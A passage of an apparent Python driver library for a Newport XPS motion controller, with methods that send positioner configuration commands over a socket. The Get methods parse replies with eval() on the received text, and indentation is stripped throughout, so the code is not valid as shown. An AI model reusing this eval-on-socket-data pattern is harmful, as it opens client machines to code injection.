if (XPS.__usedSockets[socketId] == 0):
return
command = 'KillAll()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingPositionParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersGet(' + PositionerName + ',char *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingPositionParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking position
def PositionerAnalogTrackingPositionParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingPositionParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerAnalogTrackingVelocityParametersGet : Read dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersGet(' + PositionerName + ',char *,double *,double *,double *,int *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingVelocityParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, DeadBandThreshold, Order, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(DeadBandThreshold) + ',' + str(Order) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashGet : Read backlash value and status
def PositionerBacklashGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashGet(' + PositionerName + ',double *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerBacklashSet : Set backlash value
def PositionerBacklashSet (self, socketId, PositionerName, BacklashValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashSet(' + PositionerName + ',' + str(BacklashValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashEnable : Enable the backlash
def PositionerBacklashEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashDisable : Disable the backlash
def PositionerBacklashDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersSet : Update filters parameters
def PositionerCorrectorNotchFiltersSet (self, socketId, PositionerName, NotchFrequency1, NotchBandwith1, NotchGain1, NotchFrequency2, NotchBandwith2, NotchGain2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersSet(' + PositionerName + ',' + str(NotchFrequency1) + ',' + str(NotchBandwith1) + ',' + str(NotchGain1) + ',' + str(NotchFrequency2) + ',' + str(NotchBandwith2) + ',' + str(NotchGain2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersGet : Read filters parameters
def PositionerCorrectorNotchFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFAccelerationSet : Update corrector parameters
def PositionerCorrectorPIDFFAccelerationSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainAcceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainAcceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFAccelerationGet : Read corrector parameters
def PositionerCorrectorPIDFFAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFVelocitySet : Update corrector parameters
def PositionerCorrectorPIDFFVelocitySet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocitySet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFVelocityGet : Read corrector parameters
def PositionerCorrectorPIDFFVelocityGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocityGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDDualFFVoltageSet : Update corrector parameters
def PositionerCorrectorPIDDualFFVoltageSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity, FeedForwardGainAcceleration, Friction):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ',' + str(FeedForwardGainAcceleration) + ',' + str(Friction) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDDualFFVoltageGet : Read corrector parameters
def PositionerCorrectorPIDDualFFVoltageGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(14):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIPositionSet : Update corrector parameters
def PositionerCorrectorPIPositionSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, IntegrationTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(IntegrationTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIPositionGet : Read corrector parameters
def PositionerCorrectorPIPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionGet(' + PositionerName + ',bool *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorTypeGet : Read corrector type
def PositionerCorrectorTypeGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorTypeGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCurrentVelocityAccelerationFiltersGet : Get current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCurrentVelocityAccelerationFiltersSet : Set current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersSet (self, socketId, PositionerName, CurrentVelocityCutOffFrequency, CurrentAccelerationCutOffFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersSet(' + PositionerName + ',' + str(CurrentVelocityCutOffFrequency) + ',' + str(CurrentAccelerationCutOffFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverFiltersGet : Get driver filters parameters
def PositionerDriverFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverFiltersSet : Set driver filters parameters
def PositionerDriverFiltersSet (self, socketId, PositionerName, KI, NotchFrequency, NotchBandwidth, NotchGain, LowpassFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersSet(' + PositionerName + ',' + str(KI) + ',' + str(NotchFrequency) + ',' + str(NotchBandwidth) + ',' + str(NotchGain) + ',' + str(LowpassFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverPositionOffsetsGet : Get driver stage and gage position offset
def PositionerDriverPositionOffsetsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverPositionOffsetsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverStatusGet : Read positioner driver status
def PositionerDriverStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerDriverStatusStringGet : Return the positioner driver status string corresponding to the positioner error code
def PositionerDriverStatusStringGet (self, socketId, PositionerDriverStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusStringGet(' + str(PositionerDriverStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerEncoderAmplitudeValuesGet : Read analog interpolated encoder amplitude values
def PositionerEncoderAmplitudeValuesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderAmplitudeValuesGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerEncoderCalibrationParametersGet : Read analog interpolated encoder calibration parameters
def PositionerEncoderCalibrationParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderCalibrationParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerErrorGet : Read and clear positioner error code
def PositionerErrorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorRead : Read only positioner error code without clear it
def PositionerErrorRead (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorRead(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorStringGet : Return the positioner status string corresponding to the positioner error code
def PositionerErrorStringGet (self, socketId, PositionerErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorStringGet(' + str(PositionerErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExcitationSignalGet : Read disturbing signal parameters
def PositionerExcitationSignalGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalGet(' + PositionerName + ',int *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerExcitationSignalSet : Update disturbing signal parameters
def PositionerExcitationSignalSet (self, socketId, PositionerName, Mode, Frequency, Amplitude, Time):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalSet(' + PositionerName + ',' + str(Mode) + ',' + str(Frequency) + ',' + str(Amplitude) + ',' + str(Time) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExternalLatchPositionGet : Read external latch position
def PositionerExternalLatchPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExternalLatchPositionGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusGet : Read positioner hardware status
def PositionerHardwareStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusStringGet : Return the positioner hardware status string corresponding to the positioner error code
def PositionerHardwareStatusStringGet (self, socketId, PositionerHardwareStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusStringGet(' + str(PositionerHardwareStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardInterpolatorFactorGet : Get hard interpolator parameters
def PositionerHardInterpolatorFactorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardInterpolatorFactorSet : Set hard interpolator parameters
def PositionerHardInterpolatorFactorSet (self, socketId, PositionerName, InterpolationFactor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorSet(' + PositionerName + ',' + str(InterpolationFactor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerMaximumVelocityAndAccelerationGet : Return maximum velocity and acceleration of the positioner
def PositionerMaximumVelocityAndAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMaximumVelocityAndAccelerationGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneGet : Read motion done parameters
def PositionerMotionDoneGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneSet : Update motion done parameters
def PositionerMotionDoneSet (self, socketId, PositionerName, PositionWindow, VelocityWindow, CheckingTime, MeanPeriod, TimeOut):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneSet(' + PositionerName + ',' + str(PositionWindow) + ',' + str(VelocityWindow) + ',' + str(CheckingTime) + ',' + str(MeanPeriod) + ',' + str(TimeOut) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBAlwaysEnable : Enable AquadB signal in always mode
def PositionerPositionCompareAquadBAlwaysEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBAlwaysEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBWindowedGet : Read position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedGet(' + PositionerName + ',double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareAquadBWindowedSet : Set position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareGet : Read position compare parameters
def PositionerPositionCompareGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareSet : Set position compare parameters
def PositionerPositionCompareSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, PositionStep):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(PositionStep) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareEnable : Enable position compare
def PositionerPositionCompareEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareDisable : Disable position compare
def PositionerPositionCompareDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionComparePulseParametersGet : Get position compare PCO pulse parameters
def PositionerPositionComparePulseParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionComparePulseParametersSet : Set position compare PCO pulse parameters
def PositionerPositionComparePulseParametersSet (self, socketId, PositionerName, PCOPulseWidth, EncoderSettlingTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersSet(' + PositionerName + ',' + str(PCOPulseWidth) + ',' + str(EncoderSettlingTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerRawEncoderPositionGet : Get the raw encoder position
def PositionerRawEncoderPositionGet (self, socketId, PositionerName, UserEncoderPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerRawEncoderPositionGet(' + PositionerName + ',' + str(UserEncoderPosition) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionersEncoderIndexDifferenceGet : Return the difference between index of primary axis and secondary axis (only after homesearch)
def PositionersEncoderIndexDifferenceGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionersEncoderIndexDifferenceGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaExactVelocityAjustedDisplacementGet : Return adjusted displacement to get exact velocity
def PositionerSGammaExactVelocityAjustedDisplacementGet (self, socketId, PositionerName, DesiredDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaExactVelocityAjustedDisplacementGet(' + PositionerName + ',' + str(DesiredDisplacement) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaParametersGet : Read dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerSGammaParametersSet : Update dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersSet (self, socketId, PositionerName, Velocity, Acceleration, MinimumTjerkTime, MaximumTjerkTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersSet(' + PositionerName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(MinimumTjerkTime) + ',' + str(MaximumTjerkTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerSGammaPreviousMotionTimesGet : Read SettingTime and SettlingTime
def PositionerSGammaPreviousMotionTimesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaPreviousMotionTimesGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerStageParameterGet : Return the stage parameter
def PositionerStageParameterGet (self, socketId, PositionerName, ParameterName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterGet(' + PositionerName + ',' + ParameterName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerStageParameterSet : Save the stage parameter
def PositionerStageParameterSet (self, socketId, PositionerName, ParameterName, ParameterValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterSet(' + PositionerName + ',' + ParameterName + ',' + ParameterValue + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherGet : Read time flasher parameters
def PositionerTimeFlasherGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerTimeFlasherSet : Set time flasher parameters
def PositionerTimeFlasherSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
